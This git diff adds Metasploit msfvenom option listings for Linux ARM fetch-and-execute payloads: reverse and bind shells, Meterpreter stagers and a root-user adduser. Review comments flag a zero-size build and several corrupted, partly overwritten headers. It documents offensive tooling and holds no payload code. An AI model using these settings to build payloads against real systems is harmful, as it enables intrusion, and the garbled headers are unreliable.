MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + 
PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armbe-shell_bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armbe-shell_bind_tcp.txt new file mode 100644 index 0000000..450e5ea --- /dev/null 
+++ b/msfvenom/payload_options/cmd-linux-http-armbe-shell_bind_tcp.txt 
@@ -0,0 +1,72 @@ + + Name: HTTP Fetch, Linux ARM Big Endian Command Shell, Bind TCP Inline + Module: payload/cmd/linux/http/armbe/shell_bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 0 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Balazs Bucsay @xoreipeip + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD /bin/sh yes The command to execute. +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ftrEeBVpS no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMBE payload from an HTTP server. + Listen for a connection and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. 
+ AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-adduser.txt b/msfvenom/payload_options/cmd-linux-http-armle-adduser.txt new file mode 100644 index 0000000..f8a30c9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-adduser.txt 
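Review bot: `Total size: 0` in the header of cmd-linux-http-armbe-shell_bind_tcp.txt means msfvenom produced no payload bytes for this module in the run that generated the file; every neighbouring dump in this patch reports a non-zero size (108, 114, 105), so the armbe fetch payload most likely failed to build silently. Regenerate this one and confirm the size before committing it, or leave the file out and document that the big-endian ARM fetch variant is not usable.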
@@ -0,0 +1,70 @@ + + Name: HTTP Fetch, Linux Add User + Module: payload/cmd/linux/http/armle/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 108 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME CXQGzVAHjB no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. 
+ Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-exec.txt b/msfvenom/payload_options/cmd-linux-http-armle-exec.txt new file mode 100644 index 0000000..bebfb8a --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-exec.txt 
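Review bot: the `FETCH_FILENAME` default in cmd-linux-http-armle-adduser.txt (`CXQGzVAHjB`) is a random per-run value; each file in this patch carries a different string (`ftrEeBVpS`, `RehdCjIlUXKQ`, `jXmsYyvUo`, and so on), so every regeneration of these dumps will rewrite that line in every payload_options file and bury real option changes in noise. Pin it when generating (a fixed `FETCH_FILENAME=<placeholder>` on the msfvenom command line, if the generator applies datastore options before `--list-options`) or post-process the value to a constant placeholder.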
@@ -0,0 +1,68 @@ + + Name: HTTP Fetch, Linux Execute Command + Module: payload/cmd/linux/http/armle/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Jonathan Salwan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME RehdCjIlUXKQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. 
+ Execute an arbitrary command + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-bind_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-bind_tcp.txt new file mode 100644 index 0000000..a145fca --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-bind_tcp.txt 
@@ -0,0 +1,96 @@ + + Name: HTTP Fetch, Bind TCP Stager + Module: payload/cmd/linux/http/armle/meterpreter/bind_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + Adam Cammack + nemo + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jXmsYyvUo no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Listen for a connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. 
+ AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork 
false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..82e41f7 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter-reverse_tcp.txt 
@@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/armle/meterpreter/reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 105 + Rank: Nor +Evasion options for payload/cmd/linux/http/armle/meterpreter/reverse_tcp: +========================= + + nemo + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME NElxiOYcd no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_http.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_http.txt new file mode 100644 index 0000000..23d34ed --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_http.txt 
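Review bot: the header of cmd-linux-http-armle-meterpreter-reverse_tcp.txt is corrupted: `Rank: Nor` is cut mid-word and is immediately followed by `Evasion options for payload/cmd/linux/http/armle/meterpreter/reverse_tcp:` and a rule of `=`, after which only `nemo` and `tkmru` remain of the contributor list; the `Provided by:` label and the first authors are gone. Compare the bind_tcp dump in this same patch, whose header reads `Rank: Normal`, `Provided by:`, `Brendan Watters`, `Spencer McIntyre`, `Adam Cammack`, `nemo`. It looks as if the evasion-options block was written over the captured output (a second stream or an overlapping write); regenerate this file with stdout and stderr captured separately and diff it against the bind_tcp header before merging.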
@@ -0,0 +1,104 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armle/meterpreter_reverse_http + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_http: +========================= + +cook@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME XnlZncyaIRhL no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A 
string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_https.txt b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_https.txt new file mode 100644 index 0000000..d77f1c8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-armle-meterpreter_reverse_https.txt 
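Review bot: the same header corruption appears in cmd-linux-http-armle-meterpreter_reverse_http.txt, where `Provided by:` is followed by an empty line, the `Evasion options for ...` banner, and then a bare `cook@rapid7.com>` before `timwr`; that fragment is the tail of a contributor line with an e-mail address, and the clean meterpreter_reverse_tcp dump later in this patch lists `Brendan Watters`, `Spencer McIntyre`, `Adam Cammack`, `Brent Cook`, `timwr`, which is what was overwritten here. Separately, the `HttpUserAgent` default in this file is a Safari string while the reverse_https file carries a Firefox string, so this value is also randomized per run and will churn on every regeneration; pin or placeholder it the same way as `FETCH_FILENAME`.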
@@ -0,0 +1,106 @@ + + Name: HTTP Fetch + Module: payload/cmd/linux/http/armle/meterpreter_reverse_https + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 111 + Rank: Normal + +Provided by: + +Evasion options for payload/cmd/linux/http/armle/meterpreter_reverse_https: +========================= + +ok@rapid7.com> + timwr + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wAhDSkfiYAV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an ARMLE payload from an HTTP server. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

